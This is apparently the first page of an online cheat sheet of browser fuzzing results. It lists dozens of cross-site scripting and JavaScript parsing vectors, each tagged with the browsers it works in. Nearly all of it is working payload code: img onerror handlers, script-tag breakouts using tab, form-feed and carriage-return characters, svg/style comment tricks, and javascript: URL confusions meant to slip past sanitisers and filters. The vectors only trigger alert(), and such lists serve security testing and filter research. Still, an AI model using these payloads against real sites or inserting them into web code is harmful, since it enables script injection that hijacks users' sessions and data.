Cheat Sheet

Generated payloads from fuzz test results. Filter by type, category, or browser.

Found 153 vectors with results

/^\s+$/.test(String.fromCodePoint(9)) && alert(9)
JSRegular ExpressionsChromeSafariFirefox
/^\s+$/.test(String.fromCodePoint(10)) && alert(10)
JSRegular ExpressionsChromeSafariFirefox
/^\s+$/.test(String.fromCodePoint(11)) && alert(11)
JSRegular ExpressionsChromeSafariFirefox
/^\s+$/.test(String.fromCodePoint(12)) && alert(12)
JSRegular ExpressionsChromeSafariFirefox
/^\s+$/.test(String.fromCodePoint(13)) && alert(13)
JSRegular ExpressionsChromeSafariFirefox
/\p{scx=Latin}+/gu.test(String.fromCodePoint(i)) && alert(i)
JSRegular ExpressionsChromeFirefoxMicrosoft Edge
/\w/ui.test(String.fromCodePoint(i)) && alert(i)
JSRegular ExpressionsChromeFirefoxSafari
let chr = String.fromCodePoint(0);0x0D
let a = document.createElement("a");0x0D
a.href = '/'+chr+'/example.com';0x0D
new URL(a.href).host === "example.com" && alert(0)
JSURL HandlingChrome
alert0x09(9);//
JSJavaScript SyntaxChromeSafariFirefox
alert
(10);//
JSJavaScript SyntaxChromeSafariFirefox
alert0x0B(11);//
JSJavaScript SyntaxChromeSafariFirefox
alert0x0C(12);//
JSJavaScript SyntaxChromeSafariFirefox
alert0x0D(13);//
JSJavaScript SyntaxChromeSafariFirefox
const url = new URL(`/${String.fromCodePoint(0)}javascript:alert(origin)`);0x0D
if (url.protocol === 'javascript:') {0x0D
    alert(0);0x0D
}
JSURL HandlingChrome
<script>0x0D
a="</script
><img src=data: onerror=alert(10)>"0x0D
</script>
XSSHTML ParsingChromeFirefoxSafari
<script>0x0D
a="</script0x0C><img src=data: onerror=alert(12)>"0x0D
</script>
XSSHTML ParsingChromeFirefoxSafari
<script>0x0D
a="</script0x0D><img src=data: onerror=alert(13)>"0x0D
</script>
XSSHTML ParsingChromeFirefoxSafari
<script>0x0D
a="</script ><img src=data: onerror=alert(32)>"0x0D
</script>
XSSHTML ParsingChromeFirefoxSafari
<script>0x0D
a="</script>><img src=data: onerror=alert(62)>"0x0D
</script>
XSSHTML ParsingChromeFirefoxSafari
<a id="user_id" href="https:#blah/../../"></a>
XSSURL HandlingChromeSafariFirefox
<a id="user_id" href="https:%blah/../../"></a>
XSSURL HandlingChromeSafariFirefox
<a id="user_id" href="https::blah/../../"></a>
XSSURL HandlingChromeSafariFirefox
<a id="user_id" href="https:<blah/../../"></a>
XSSURL HandlingChromeSafariFirefox
<<img src onerror=alert(60)>
XSSHTML ParsingChromeFirefox
<img src onerror=alert(9)0x09style=display:block;content-visibility:auto>
XSSHTML ParsingChrome
<img src onerror=alert(10)
style=display:block;content-visibility:auto>
XSSHTML ParsingChrome
<img src onerror=alert(12)0x0Cstyle=display:block;content-visibility:auto>
XSSHTML ParsingChrome
<img src onerror=alert(13)0x0Dstyle=display:block;content-visibility:auto>
XSSHTML ParsingChrome
<img src onerror=alert(32) style=display:block;content-visibility:auto>
XSSHTML ParsingChrome
<img src onerror0x09=alert(9)>
XSSHTML ParsingChromeFirefox
<img src onerror
=alert(10)>
XSSHTML ParsingChromeFirefox
<img src onerror0x0C=alert(12)>
XSSHTML ParsingChromeFirefox
<img src onerror0x0D=alert(13)>
XSSHTML ParsingChromeFirefox
<img src onerror =alert(32)>
XSSHTML ParsingChromeFirefox
<svg //><style><!--</style><img src onerror=alert(47)>
XSSCSS ParsingChromeFirefoxSafari
<svg />><style><!--</style><img src onerror=alert(62)>
XSSCSS ParsingChromeFirefoxSafari
<title>abc</title0x09><img src=x onerror=alert(9)>
XSSHTML ParsingChromeSafariFirefox
<title>abc</title
><img src=x onerror=alert(10)>
XSSHTML ParsingChromeSafariFirefox
<title>abc</title0x0C><img src=x onerror=alert(12)>
XSSHTML ParsingChromeSafariFirefox
<title>abc</title0x0D><img src=x onerror=alert(13)>
XSSHTML ParsingChromeSafariFirefox
<title>abc</title ><img src=x onerror=alert(32)>
XSSHTML ParsingChromeSafariFirefox
<div id="x9"><span x="href=0x09&gt;&bbb"></span></div>0x0D
<script>0x0D
window["x9"].innerHTML=window["x9"].innerHTML;0x0D
if (window["x9"].firstChild.getAttribute("href") != null)0x0D
{0x0D
alert(9)0x0D
}0x0D
</script>
XSSURL HandlingChromeMicrosoft Edge
<div id="x10"><span x="href=
&gt;&bbb"></span></div>0x0D
<script>0x0D
window["x10"].innerHTML=window["x10"].innerHTML;0x0D
if (window["x10"].firstChild.getAttribute("href") != null)0x0D
{0x0D
alert(10)0x0D
}0x0D
</script>
XSSURL HandlingChromeMicrosoft Edge
<div id="x12"><span x="href=0x0C&gt;&bbb"></span></div>0x0D
<script>0x0D
window["x12"].innerHTML=window["x12"].innerHTML;0x0D
if (window["x12"].firstChild.getAttribute("href") != null)0x0D
{0x0D
alert(12)0x0D
}0x0D
</script>
XSSURL HandlingChromeMicrosoft Edge
<div id="x13"><span x="href=0x0D&gt;&bbb"></span></div>0x0D
<script>0x0D
window["x13"].innerHTML=window["x13"].innerHTML;0x0D
if (window["x13"].firstChild.getAttribute("href") != null)0x0D
{0x0D
alert(13)0x0D
}0x0D
</script>
XSSURL HandlingChromeMicrosoft Edge
<div id="x32"><span x="href= &gt;&bbb"></span></div>0x0D
<script>0x0D
window["x32"].innerHTML=window["x32"].innerHTML;0x0D
if (window["x32"].firstChild.getAttribute("href") != null)0x0D
{0x0D
alert(32)0x0D
}0x0D
</script>
XSSURL HandlingChromeMicrosoft Edge
<svg /><style><!--</style><img src onerror=alert(47)>
XSSCSS ParsingChromeFirefoxSafariMicrosoft Edge
if (new URL("javascript0x09://xss.com").host=="xss.com"){alert(9)}
JSURL HandlingChromeFirefoxSafariMicrosoft Edge
if (new URL("javascript+://xss.com").host=="xss.com"){alert(43)}
JSURL HandlingChromeFirefoxSafariMicrosoft Edge
if (new URL("javascript-://xss.com").host=="xss.com"){alert(45)}
JSURL HandlingChromeFirefoxSafariMicrosoft Edge
if (new URL("javascript.://xss.com").host=="xss.com"){alert(46)}
JSURL HandlingChromeFirefoxSafariMicrosoft Edge
if (new URL("javascript0://xss.com").host=="xss.com"){alert(48)}
JSURL HandlingChromeFirefoxSafariMicrosoft Edge
1337nโŸฆ09โŸงin alert(9)
JSXSS ExecutionChromeFirefoxSafari
1337n
in alert(10)
JSXSS ExecutionChromeFirefoxSafari
1337n0x0Bin alert(11)
JSXSS ExecutionChromeFirefoxSafari
1337n0x0Cin alert(12)
JSXSS ExecutionChromeFirefoxSafari
1337n0x0Din alert(13)
JSXSS ExecutionChromeFirefoxSafari
โŸฆ09โŸงx=123โŸฆ09โŸง0x0D
alert(9)
JSXSS ExecutionChromeFirefoxSafari

x=123
0x0D
alert(10)
JSXSS ExecutionChromeFirefoxSafari
0x0Bx=1230x0B0x0D
alert(11)
JSXSS ExecutionChromeFirefoxSafari
0x0Cx=1230x0C0x0D
alert(12)
JSXSS ExecutionChromeFirefoxSafari
0x0Dx=1230x0D0x0D
alert(13)
JSXSS ExecutionChromeFirefoxSafari
throw0x09alert(9)
JSXSS ExecutionChromeFirefoxSafari
throw0x0Balert(11)
JSXSS ExecutionChromeFirefoxSafari
throw0x0Calert(12)
JSXSS ExecutionChromeFirefoxSafari
throw alert(32)
JSXSS ExecutionChromeFirefoxSafari
throw!alert(33)
JSXSS ExecutionChromeFirefoxSafari
const s = String.fromCodePoint(i);0x0D
if (!encodeURI(s).includes("%")) alert(i);0x0D
JSJavaScript SyntaxChrome

Page 1 of 8